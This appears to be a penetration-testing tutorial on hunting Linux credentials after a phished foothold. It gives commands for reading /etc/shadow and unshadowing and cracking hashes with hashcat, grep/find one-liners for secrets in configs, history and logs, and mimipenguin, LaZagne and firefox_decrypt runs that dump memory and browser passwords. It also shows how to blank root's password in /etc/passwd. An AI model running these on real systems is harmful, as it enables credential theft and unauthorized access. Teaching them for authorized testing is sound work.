Big Picture

Let’s say you’re on a penetration test for a random company and you are able to phish a basic user’s credentials and remotely connect to their workstation. This user doesn’t have any admin privileges so it’s hard to do cool things and move laterally across the network. Luckily you’ve stumbled across this article and after reading, will have some new things to try and find other credentials on this workstation (and other Linux systems).

Linux Authentication Process

Here are some important files where you could find a user’s password and password hashes on Linux systems and also some of their security risks.

/etc/passwd

Readable by all users (world-readable)
Contains user account information (7 fields): username, password placeholder, UID, GID, GECOS, home directory, shell
Password field typically shows x (meaning hash stored in /etc/shadow)
Security risk: If writeable or contains actual hashes, can be exploited
Exploit: Remove password field for root (root::0:0:…) = no password prompt on login

/etc/shadow

Only readable by root/admin users
Stores actual password hashes (9 fields)
Format: username:$id$salt$hashed:lastchange:minage:maxage:warning:…
If password field has ! or * = user cannot login with Unix password (but other methods like SSH keys still work)
Empty password field = no password required

/etc/security/opasswd

Stores old/previous passwords to prevent reuse
Requires root privileges to read
Useful for finding password patterns and easier-to-crack old hashes

Hash Algorithm IDs

Hashing is a one-way operation where plaintext data is scrambled (fancy maths) into strings of random characters. Since Hashing is a one way algorithm we can’t un-hash anything, what we can do is hash plaintext with the same algorithm and see if it’s the same as the stored plaintext. When you are looking in these files and finding stored passwords that are Hashed, you can look for identifiers to see which algorithm was used. Older algorithms like MD5 are much easier to crack than modern ones.

$1$ = MD5 (easier to crack)
$5$ = SHA-256
$6$ = SHA-512
$y$ = Yescrypt (modern default)
$2a$ = Blowfish
$7$ = Scrypt

Cracking Linux Credentials

John the Ripper is a really good tool that usually takes a list of random plaintext potential passwords (rockyou.txt is a good one with around 70 gigs of potential passwords) and hashes them to see if you can find any matches to some stored hashes. Unshadow is another good linux tool that can get a file ready to be run though JTR and other hash cracking tools.

unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

Hashcat

Hashcat is the world’s fastest and most advanced password recovery/cracking tool. It’s an open-source utility that attempts to recover plaintext passwords from their hashed versions by systematically trying different password combinations.

Hashcat takes a hash and tries to find the original plaintext password by:

Generating password guesses
Hashing each guess using the same algorithm
Comparing the result to the target hash
When they match, you’ve found the password

If we wanted to run this in a linux terminal this would be the command to use:

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
Mode 1800 = Linux shadow file format
Outputs cracked passwords to specified file

PAM (Pluggable Authentication Modules)

PAM is a flexible authentication framework used by Linux systems to handle various authentication-related tasks. It acts as a middle layer between applications (like login, ssh, sudo) and the actual authentication mechanisms, allowing administrators to configure how users authenticate without modifying individual applications. The PAM module reads password hashes and you can sometimes extract hashes from the module if you don’t have access to /etc/shadow.

Module location: /usr/lib/x86_64-linux-gnu/security/
Common module: pam_unix.so (manages passwd/shadow updates)

Credential Hunting in Linux

There are other locations that can hold credentials on Linux systems

Files (configs, databases, notes, scripts, cronjobs, SSH keys)
History (logs, command-line history)
Memory (cache, in-memory processing)
Key-rings (browser stored credentials)

Here are some tactics and commands you can use to try and locate some of these credentials:

Searching Files

Configuration Files

Common extensions: .conf, .config, .cnf

Find all config files:

for l in $(echo ".conf .config .cnf");do find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core";done

Search configs for credentials:

Config files often contain hardcoded credentials for services

Database Files

Extensions: .sql, .db, .*db, .db*

Notes/Text Files

find /home/* -type f -name "*.txt" -o ! -name "*.*"

Notes may contain credentials lists, access points

Scripts

Extensions: .py, .pyc, .pl, .go, .jar, .c, .sh

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

Scripts often contain hardcoded credentials for automation

Cronjobs

Locations: /etc/crontab, /etc/cron.daily, /etc/cron.hourly, /etc/cron.d/

cat /etc/crontab

ls -la /etc/cron.*/

Automated scripts may contain credentials

History Files

Command History

Files: .bash_history, .bashrc, .bash_profile

tail -n5 /home/*/.bash*

Users may have typed passwords in commands

Log Files

Log files are being constantly generated and stored on linux systems. They can also contain credentials that we may be looking for. Here are some common log files and their locations:

/var/log/messages – Generic system activity logs

/var/log/syslog – Generic system activity logs

/var/log/auth.log – (Debian) All authentication related logs

/var/log/secure – (RedHat/CentOS) All authentication related logs

/var/log/boot.log – Booting information

/var/log/dmesg – Hardware and drivers related information and logs

/var/log/kern.log – Kernel related warnings, errors and logs

/var/log/faillog – Failed login attempts

/var/log/cron – Information related to cron jobs

/var/log/mail.log – All mail server related logs

/var/log/httpd – All Apache related logs

/var/log/mysqld.log – All MySQL server related logs

Important logs:

/var/log/auth.log (Debian) or /var/log/secure (RedHat) – authentication logs
/var/log/syslog – system activity
/var/log/messages – generic logs
/var/log/cron – cronjob logs

Search logs for credentials linux command:

for i in $(ls /var/log/* 2>/dev/null);do grep "accepted\|session opened\|failure\|failed\|ssh\|password changed\|new user\|sudo\|COMMAND" $i 2>/dev/null;done

Memory and Cache

Sometimes when users log in to their account or other services, their credentials can get stored in temporary memory and data caches. You can use some valuable tools to try and snatch these credentials from the cache before they get dumped.

Mimipenguin

sudo python3 mimipenguin.py

Extracts credentials from memory (logged-in users)
This requires Root/admin privileges

LaZagne (Linux Version)

sudo python2.7 laZagne.py all

Extracts credentials from 30+ sources including:
- WiFi, browser passwords, SSH keys, Git configs
- Environment variables, Docker, Shadow hashes
- Keyrings (encrypted password storage)
Powerful all-in-one credential extraction tool

Browser Credentials

Sometimes users will re-use their passwords for different online accounts. We can use some of these tools to try and grab the credentials from different browsers:

Firefox

Storage: Encrypted in ~/.mozilla/firefox/[profile]/logins.json

View encrypted data:

cat .mozilla/firefox/[profile]/logins.json | jq .

Decrypt with Firefox Decrypt:

python3.9 firefox_decrypt.py

Browser stores encrypted credentials that can be decrypted with tools

Or use LaZagne:

python3 laZagne.py browsers

Key Search Terms

When in doubt, try also looking for these general key terms when searching files, look for:

user, username, password, pass, pwd
login, creds, credentials, keys
configuration, dbpassword, dbcredential

You should tailor searches based on system purpose (web server, database server, desktop, etc.)

Cole Hartnett -- Zenless Skeleton Cyber

Credential Hunting on Linux Systems